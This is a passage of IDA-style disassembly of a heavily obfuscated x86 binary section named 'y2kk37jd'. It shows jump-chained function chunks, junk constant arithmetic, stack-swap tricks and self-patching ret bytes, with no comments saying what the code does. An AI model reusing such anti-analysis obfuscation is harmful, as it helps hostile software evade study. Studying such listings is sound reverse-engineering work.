; FUNCTION CHUNK AT 00454151 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004547E4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004564AD SIZE 00000006 BYTES

		jo	loc_4458FC
		mov	eax, ds:dword_4447DC
		or	eax, eax
		jnz	loc_443885
		jmp	loc_43E8F6
sub_45A961	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A97A:				; CODE XREF: y2kk37jd:loc_44732Cj
		push	edi
		pop	ebx
		pop	edi
		pop	ecx
		xchg	esi, [esp]
		mov	edx, esi
		jmp	loc_44EBA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_45A988:				; CODE XREF: sub_456809:loc_443D84j
		jns	loc_4416D5
		test	eax, 47A7EEDh
		jmp	loc_443073
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45922C

loc_45A999:				; CODE XREF: sub_45922C:loc_457981j
		add	eax, 2CEB7998h
		jnb	loc_44CE7C
		adc	ebx, 79BAED1Eh
		jmp	loc_44ED26
; END OF FUNCTION CHUNK	FOR sub_45922C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4530D8

loc_45A9B1:				; CODE XREF: sub_4530D8+21j
		pop	edx
		call	sub_45A47C
; END OF FUNCTION CHUNK	FOR sub_4530D8
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_45A9B7:				; CODE XREF: sub_44594E+7B2Aj
		ja	loc_45A07A

loc_45A9BD:				; CODE XREF: sub_44594E:loc_4404D1j
		call	sub_45405E
		mov	edx, 24CC2B1h
		push	edi
		push	52ED1A50h
		pop	edi
		jmp	loc_43C41B
; END OF FUNCTION CHUNK	FOR sub_44594E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE26

loc_45A9D3:				; CODE XREF: sub_43FE26+15j
		jl	loc_454E33

loc_45A9D9:				; CODE XREF: y2kk37jd:0045A77Ej
		jmp	loc_456003
; END OF FUNCTION CHUNK	FOR sub_43FE26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45A9DE:				; CODE XREF: sub_43ED19:loc_44E092j
		jmp	loc_45C141
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
		add	edx, esi
		rol	ecx, 3
		cdq
		jmp	loc_454E33
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_44D588
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_239. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A9F5:				; CODE XREF: y2kk37jd:0044A95Dj
		jmp	loc_44B13A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C9E7

loc_45A9FA:				; CODE XREF: sub_43C9E7+10j
		jmp	loc_4415C0
; END OF FUNCTION CHUNK	FOR sub_43C9E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45A9FF:				; CODE XREF: sub_445226-E22j
		sub	esi, 0CCFADB7Ch

loc_45AA05:				; CODE XREF: sub_445226:loc_44D326j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44FC40
		jmp	loc_44E746
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_45AA16:				; CODE XREF: y2kk37jd:00449D8Dj
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_502
; ---------------------------------------------------------------------------
		xchg	ecx, [esp]
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp]
		jmp	loc_43FD34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45651A

loc_45AA2C:				; CODE XREF: sub_45651A:loc_4524A5j
		call	sub_45349E
; END OF FUNCTION CHUNK	FOR sub_45651A
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_45AA31:				; CODE XREF: sub_43C851+172A1j
		jmp	loc_4449D4
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444440

loc_45AA36:				; CODE XREF: sub_444440:loc_444445j
		jmp	nullsub_342
; END OF FUNCTION CHUNK	FOR sub_444440
; ---------------------------------------------------------------------------

loc_45AA3B:				; CODE XREF: y2kk37jd:0045669Dj
		jnz	loc_4445EB
; START	OF FUNCTION CHUNK FOR sub_456A36

loc_45AA41:				; CODE XREF: sub_456A36+21CFj
		jmp	loc_4474D7
; END OF FUNCTION CHUNK	FOR sub_456A36
; ---------------------------------------------------------------------------
		mov	[esi], edx
		jmp	loc_4445EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45AA4D:				; CODE XREF: sub_4448E2+9678j
		add	eax, 3B7E6EEFh
		cmp	dword ptr [eax], 47424454h
		jz	loc_44D915
		jmp	loc_45537E
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_45AA64:				; CODE XREF: sub_45024B:loc_455EE9j
		or	eax, eax
		jz	loc_448A19
		call	sub_45801A

loc_45AA71:				; CODE XREF: sub_45A45E-B1C5j
		jb	loc_457691

loc_45AA77:				; CODE XREF: sub_45A45E:loc_44A036j
		push	0
		push	edx
		mov	edx, esi
		xchg	edx, [esp+8+var_8]
		jmp	loc_442CF7
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_45AA84:				; CODE XREF: sub_43F8B8:loc_44C16Bj
					; sub_44CABF:loc_44C188j
		and	edx, 6A42C078h
		add	edx, 24B47E3Dh
		add	eax, edx
		pop	edx
		push	edi
		pushf
		push	0CBFBD625h
		jmp	loc_455585
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_45AA9F:				; CODE XREF: sub_44C304:loc_443F18j
		jz	loc_456EB3
		jmp	loc_43DB1C
; END OF FUNCTION CHUNK	FOR sub_44C304

; =============== S U B	R O U T	I N E =======================================



sub_45AAAA	proc near		; CODE XREF: y2kk37jd:0043F0B7j
					; sub_445568+F41p

; FUNCTION CHUNK AT 0043E411 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F474 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453372 SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		pop	esi
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_43F474
sub_45AAAA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45AABF:				; CODE XREF: y2kk37jd:00444ECDj
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_45AAC0	proc near		; CODE XREF: sub_445226+13D2Ap

; FUNCTION CHUNK AT 0045A198 SIZE 0000000D BYTES

		xchg	edi, [esp+0]
		pop	edi
		shl	eax, cl
		and	edx, eax
		setnz	byte ptr [ebp-5]
		jmp	loc_45A198
sub_45AAC0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45AAD1	proc near		; CODE XREF: sub_43C46D+7p
					; sub_44C922-96EFj ...

; FUNCTION CHUNK AT 004420A4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00445A60 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		push	541432B5h
		pop	ebx
		rol	ebx, 0Eh
		jb	loc_4420A4

loc_45AAE5:				; CODE XREF: sub_4424B0+15D04j
		jmp	nullsub_344
sub_45AAD1	endp

; ---------------------------------------------------------------------------

loc_45AAEA:				; CODE XREF: y2kk37jd:00444F2Ej
		test	edx, ebp
		jmp	loc_43F68E

; =============== S U B	R O U T	I N E =======================================



sub_45AAF1	proc near		; CODE XREF: y2kk37jd:0044403Bj
					; y2kk37jd:00455F07p

; FUNCTION CHUNK AT 0044A4AD SIZE 00000020 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	0C035A6EAh
		xchg	esi, [esp+0]
		mov	eax, esi
		or	esi, ecx
		jmp	loc_44A4AD
sub_45AAF1	endp

; ---------------------------------------------------------------------------

loc_45AB06:				; CODE XREF: y2kk37jd:00455BB5j
		jnz	loc_43B7B0
		jmp	loc_440C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_45AB11:				; CODE XREF: sub_45B41E:loc_458611j
		xor	eax, 145DCA35h
		jns	loc_452F3A
; END OF FUNCTION CHUNK	FOR sub_45B41E
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_45AB1D:				; CODE XREF: sub_43F911+B50Cj
		jmp	loc_43C02E
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		mov	[ecx], edx
		rol	eax, 7
		jmp	loc_452F3A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2F0

loc_45AB2C:				; CODE XREF: sub_44B2F0+6A82j
		pushf
		mov	edi, ecx

loc_45AB2F:				; CODE XREF: y2kk37jd:loc_44C0CDj
		mov	eax, 80F02D07h
		call	sub_442C3E
		add	eax, 0EDBEE97Ah
		push	offset loc_453354
		jmp	nullsub_345
; END OF FUNCTION CHUNK	FOR sub_44B2F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_45AB49:				; CODE XREF: sub_448700:loc_445014j
		push	0DB34F0Ch
		pop	edx
		and	edx, 0E8A193EBh
		test	edx, 2
		jmp	loc_453186
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448512

loc_45AB60:				; CODE XREF: sub_448512:loc_447C0Fj
		mov	eax, ebx
		push	offset sub_4488AC
		jmp	loc_44D667
; END OF FUNCTION CHUNK	FOR sub_448512
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_45AB6C:				; CODE XREF: sub_453B0B:loc_43FE71j
		xchg	ebx, [esp+0]
		push	ebx
		pop	edx
		pop	ebx
		mov	eax, [esp-4+arg_0]
		jmp	loc_443456
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_45AB7A:				; CODE XREF: sub_43F0A5:loc_44F925j
		push	69FDB8A0h
		pop	edx
		xor	edx, 0D60A31C4h
		or	edx, 9447097Dh
		jnz	loc_44393F

loc_45AB92:				; CODE XREF: y2kk37jd:00451EFDj
		jmp	loc_45485A
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; ---------------------------------------------------------------------------
		jnz	loc_45B215
		push	edi
		jmp	loc_44FA5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_45ABA3:				; CODE XREF: sub_43E0DE+1D5F6j
		cmp	al, 0A4h
		jz	loc_452F6F
		jmp	loc_45779F
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; ---------------------------------------------------------------------------
		jg	loc_44D508
		jmp	sub_4429DD
; ---------------------------------------------------------------------------
		adc	esi, 0C0A6C5ACh
		push	3084CFFAh
		jmp	sub_44A48B
; ---------------------------------------------------------------------------

loc_45ABCB:				; CODE XREF: y2kk37jd:0045AD37j
		pop	edi
		rol	edi, 6
		or	edi, ds:4000E8h
		add	edi, 7F65F6ECh
		or	edi, 0D040A853h
		add	edi, 97EF8D4h
		xchg	edi, [esp]
		jmp	sub_4581BB
; ---------------------------------------------------------------------------

loc_45ABEF:				; CODE XREF: y2kk37jd:loc_43FAC2j
		mov	[ecx], eax
		call	sub_451788
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_45ABF6:				; CODE XREF: sub_4458DD+5BFFj
		jmp	loc_45BB8F
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4407FF

loc_45ABFB:				; CODE XREF: sub_4407FF+6j
		push	0CBF44B0Ah
		pop	esi
		xor	esi, 64D8AA5h
		add	esi, 328B5458h
		popf
		xchg	esi, [esp+0]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_4407FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44803E

loc_45AC16:				; CODE XREF: sub_44803E:loc_45C07Dj
		push	edi
		call	sub_44D935
; END OF FUNCTION CHUNK	FOR sub_44803E
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_45AC1C:				; CODE XREF: sub_455B08+2DCEj
		jmp	loc_447A17
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------

loc_45AC21:				; CODE XREF: y2kk37jd:0043C2FDj
		test	esi, ecx
		jmp	loc_44B290
; ---------------------------------------------------------------------------

loc_45AC28:				; CODE XREF: y2kk37jd:00446737j
		jb	loc_45328B
		shl	edi, 1Fh
		jmp	sub_457410
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_45AC36:				; CODE XREF: sub_43D41D:loc_45A158j
		xchg	ebx, [esp+4+var_4]
		jmp	nullsub_427
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
		and	eax, esi
		jmp	loc_43CF41
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_212. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45AC46:				; CODE XREF: y2kk37jd:0044ED06j
		jmp	loc_443FE6

; =============== S U B	R O U T	I N E =======================================



sub_45AC4B	proc near		; CODE XREF: y2kk37jd:00440BC1j
					; sub_44DBF8+B18Ep ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D9AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444409 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446CAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F7CC SIZE 00000015 BYTES

		jns	sub_44DC32
		push	esi
		mov	esi, 0DF21D2BDh
		jmp	loc_44F7CC
sub_45AC4B	endp


; =============== S U B	R O U T	I N E =======================================



sub_45AC5C	proc near		; DATA XREF: y2kk37jd:loc_43E1FBo

; FUNCTION CHUNK AT 0045A6EA SIZE 00000005 BYTES

		add	edi, 0CE4E2B70h
		xchg	edi, [esp+0]
		jmp	loc_45A6EA
sub_45AC5C	endp

; ---------------------------------------------------------------------------
		ja	loc_43BC69
		jge	loc_4477AC
		jmp	sub_44E0F1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_230. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BB1F

loc_45AC7C:				; CODE XREF: sub_45BB1F+Dj
		jmp	loc_45C025
; END OF FUNCTION CHUNK	FOR sub_45BB1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_45AC81:				; CODE XREF: sub_44F641+1CC4j
		jmp	loc_457891
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
		mov	[edx], esi
		jmp	loc_444B55

; =============== S U B	R O U T	I N E =======================================



sub_45AC8D	proc near		; CODE XREF: y2kk37jd:0043E83Fj
					; sub_44F641+Bp

; FUNCTION CHUNK AT 0044219D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00449576 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DDD4 SIZE 00000006 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	esi
		push	9A3CA50Ah
		pop	esi
		rol	esi, 4
		cmp	esi, 0B06D17E4h
		jmp	loc_449576
sub_45AC8D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CB02

loc_45ACA6:				; CODE XREF: sub_43CB02+1544Fj
		jnz	loc_455233
		shl	edx, 0Eh
		ror	ecx, 1Ch
		adc	edi, eax

loc_45ACB4:				; CODE XREF: sub_43CB02:loc_451F45j
		and	esi, 0B8E4E15Ch
		sub	esi, 12D62EC1h
		add	esi, 0E256996Fh
		xchg	esi, [esp+0]
		jmp	loc_4592ED
; END OF FUNCTION CHUNK	FOR sub_43CB02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2F9

loc_45ACCE:				; CODE XREF: sub_45A2F9-18005j
		ja	loc_440692
		xor	ebp, 0BF9AA3Dh
		jmp	loc_4505E6
; END OF FUNCTION CHUNK	FOR sub_45A2F9
; ---------------------------------------------------------------------------

loc_45ACDF:				; CODE XREF: y2kk37jd:004444DEj
		popf
		shl	esi, 1Fh

loc_45ACE3:				; CODE XREF: y2kk37jd:loc_4563FAj
		mov	eax, [esp]
		call	sub_44AD49
; START	OF FUNCTION CHUNK FOR sub_447407

loc_45ACEB:				; CODE XREF: sub_447407-655Ej
					; y2kk37jd:00442B1Bj
		xchg	eax, [esp+0]
		jmp	loc_458D9A
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DBF8

loc_45ACF3:				; CODE XREF: sub_44DBF8-230Fj
		jnz	loc_457D94
		jmp	loc_4522B8
; END OF FUNCTION CHUNK	FOR sub_44DBF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_222. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED32

loc_45ACFF:				; CODE XREF: sub_43ED32+F149j
		jmp	loc_43ED42
; END OF FUNCTION CHUNK	FOR sub_43ED32
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_45AD04:				; CODE XREF: sub_43ED86:loc_44AFBEj
		sub	eax, edx
		pop	edx
		ror	eax, 14h
		sub	eax, 6DC3A957h
		jmp	loc_44DE41
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4487FD

loc_45AD15:				; CODE XREF: sub_4487FD+8D03j
		sub	al, 99h
; END OF FUNCTION CHUNK	FOR sub_4487FD
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_45AD17:				; CODE XREF: sub_443AA7:loc_43E3A4j
		mov	edx, [ebp-4]
		push	offset sub_44B8FF
		jmp	nullsub_353
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_45AD24:				; CODE XREF: y2kk37jd:loc_4596B3j
					; y2kk37jd:0045A5C5j
		mov	eax, [esp]
		call	sub_44AD49

loc_45AD2C:				; CODE XREF: y2kk37jd:00449717j
					; y2kk37jd:0044C763j
		xchg	eax, [esp]
		mov	edx, eax
		push	edi
		push	0F45C79CAh
		jmp	loc_45ABCB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_45AD3C:				; CODE XREF: sub_447F91:loc_44F2ECj
					; y2kk37jd:004501FEj
		jnz	loc_447B9A
		jmp	loc_455D52
; END OF FUNCTION CHUNK	FOR sub_447F91
; ---------------------------------------------------------------------------

loc_45AD47:				; CODE XREF: y2kk37jd:loc_446BBAj
		jnz	loc_448C75
		jmp	loc_454DE4
; ---------------------------------------------------------------------------

loc_45AD52:				; CODE XREF: y2kk37jd:loc_4543EAj
		or	ecx, 28651D93h
		add	ecx, 84CD1344h
		xchg	ecx, [esp]
		jmp	sub_454D0F
; ---------------------------------------------------------------------------
		mov	eax, 0FFB060E7h
		call	sub_442C3E
		mov	ds:dword_41E1B4, eax
		lea	eax, nullsub_455
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_455
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45AD84:				; CODE XREF: sub_4411C3:loc_43D0F9j
		mov	eax, [esp+4+var_4]
		push	edx
		jmp	loc_45C3F4
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_45AD8D	proc near		; CODE XREF: sub_43B4CB+Fp
					; y2kk37jd:004593F2j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CC90 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043DEF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D5F SIZE 00000005 BYTES

		xchg	eax, [esp-4+arg_0]

loc_45AD90:				; CODE XREF: y2kk37jd:loc_455E7Fj
		pop	eax
		push	0F7D25C24h
		xchg	esi, [esp-4+arg_0]
		jmp	loc_43DEF3
sub_45AD8D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edx, ecx
		ja	loc_45992E
		jmp	sub_442002
; ---------------------------------------------------------------------------

loc_45ADAB:				; CODE XREF: y2kk37jd:004523C7j
		ja	nullsub_11
		jle	loc_4588BE
		jmp	loc_4490A9
; ---------------------------------------------------------------------------
		not	ecx
		jmp	sub_44A298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45ADC3:				; CODE XREF: sub_43ED19:loc_44F66Aj
		cmp	ebx, ecx
		jmp	loc_44BA03
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44723A

loc_45ADCA:				; CODE XREF: sub_44723A+Fj
		cmp	ds:dword_446628, 0
		jnz	loc_43B13A
		jmp	loc_45B5D2
; END OF FUNCTION CHUNK	FOR sub_44723A
; ---------------------------------------------------------------------------
		push	ecx
		jmp	sub_4527B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45ADE2:				; CODE XREF: sub_445226+496j
					; sub_4585C4:loc_44AAD4j ...
		push	offset sub_447034
		jmp	nullsub_355
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45ADEC	proc near		; CODE XREF: sub_43B7F3+4p
					; sub_43C498+7p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004439CB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443D66 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446375 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004463F2 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00446665 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446AAA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447F05 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004481EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A21F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044D123 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044D890 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EBE3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004522A0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458294 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045C23F SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		jmp	loc_446375
sub_45ADEC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_45ADFB:				; CODE XREF: sub_43E679:loc_44B8B0j
		xor	edi, 8ADBE56Ch

loc_45AE01:				; CODE XREF: y2kk37jd:loc_44F92Aj
		add	edi, 4E70CA41h
		mov	[edi], eax
		pop	edi
		lea	eax, loc_43FE46
		jmp	loc_4489EC
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443CD

loc_45AE15:				; CODE XREF: sub_4443CD+11j
		push	0DA275F49h
		xor	eax, ecx
		jmp	loc_44E4F0
; END OF FUNCTION CHUNK	FOR sub_4443CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_45AE21:				; CODE XREF: sub_43D412:loc_4406CEj
		xchg	ecx, [esp+8+var_8]
		jmp	loc_447C6F
; END OF FUNCTION CHUNK	FOR sub_43D412
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_437. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440A47

loc_45AE2A:				; CODE XREF: sub_440A47+Dj
		jmp	loc_45671F
; END OF FUNCTION CHUNK	FOR sub_440A47
; ---------------------------------------------------------------------------

loc_45AE2F:				; CODE XREF: y2kk37jd:0043BAEDj
		jmp	locret_444193
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459672

loc_45AE34:				; CODE XREF: sub_459672-1E291j
		jmp	loc_44423D
; END OF FUNCTION CHUNK	FOR sub_459672
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_179. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_45AE3A:				; CODE XREF: sub_44346B+D4B4j
		jmp	loc_453878
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44966C

loc_45AE3F:				; CODE XREF: sub_44966C:loc_443683j
		jmp	loc_4585F2
; END OF FUNCTION CHUNK	FOR sub_44966C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B488

loc_45AE44:				; CODE XREF: sub_43B488+Aj
		jmp	loc_44F907
; END OF FUNCTION CHUNK	FOR sub_43B488
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45AE49:				; CODE XREF: sub_45689F:loc_43BB34j
		and	esi, 35E78CCCh
		add	esi, 0DAB9737Dh
		xchg	esi, [esp+0]
		lea	eax, [ebp-800h]
		push	eax
		call	sub_440B16
		test	eax, eax
		jmp	loc_44232E
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_45AE6B:				; CODE XREF: y2kk37jd:00444C31j
		jb	loc_43BF0F
		mov	eax, [ebx]
		jmp	loc_45893F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_45AE78:				; CODE XREF: sub_4562E5:loc_43D99Aj
					; y2kk37jd:0043D9C1j
		xor	esi, 0FF7EDD3Ah
		xchg	esi, [esp+4+var_4]
		lea	eax, [ebp-10h]
		push	eax
		push	eax
		push	0D52DD657h
		jmp	loc_448429
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45AE90:				; CODE XREF: sub_4411C3:loc_43C98Fj
		add	eax, 0C53F854Dh
		add	eax, ebp
		push	offset loc_45A2AC
		jmp	loc_453928
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_45AEA2:				; CODE XREF: sub_4514DE:loc_4595EFj
		shl	edi, 0Dh
		sub	esi, ebp
		jmp	loc_452368
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D6F

loc_45AEAC:				; CODE XREF: sub_444D6F:loc_45AEC8j
		add	eax, 0E95FCFC4h
		xor	eax, 0C787CBD0h
		push	offset loc_445268
		jmp	loc_44EE57
; ---------------------------------------------------------------------------

loc_45AEC2:				; CODE XREF: sub_444D6F:loc_44AD91j
		jge	loc_4449B1

loc_45AEC8:				; CODE XREF: sub_44B489+9044j
		jmp	loc_45AEAC
; END OF FUNCTION CHUNK	FOR sub_444D6F
; ---------------------------------------------------------------------------
		add	esi, ecx
		add	ebx, 0CDA2D0B3h
		jmp	loc_4449A8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_113. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45354C

loc_45AEDB:				; CODE XREF: sub_45354C+Dj
		jmp	loc_44F97A
; END OF FUNCTION CHUNK	FOR sub_45354C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459789

loc_45AEE0:				; CODE XREF: sub_459789-121E0j
		jmp	loc_4508A3
; END OF FUNCTION CHUNK	FOR sub_459789
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FC9

loc_45AEE5:				; CODE XREF: sub_440FC9+Fj
		jmp	loc_44B1D2
; END OF FUNCTION CHUNK	FOR sub_440FC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_45AEEA:				; CODE XREF: sub_443EAB-DB2j
		pop	ecx
		mov	[ebp+var_14], eax
		mov	eax, [ebp+var_14]
		add	eax, 0FEBDF3B6h
		jmp	loc_44BF08
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------

loc_45AEFC:				; CODE XREF: y2kk37jd:004577C5j
		add	edi, 0B643F0D8h
		mov	[edi], eax
		pop	edi
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F5C5

loc_45AF06:				; CODE XREF: sub_43F5C5+17DBEj
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_43F5C5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457B90

loc_45AF0B:				; CODE XREF: sub_457B90:loc_43D88Ej
		rol	eax, 15h
		push	eax
		jmp	loc_4470EC
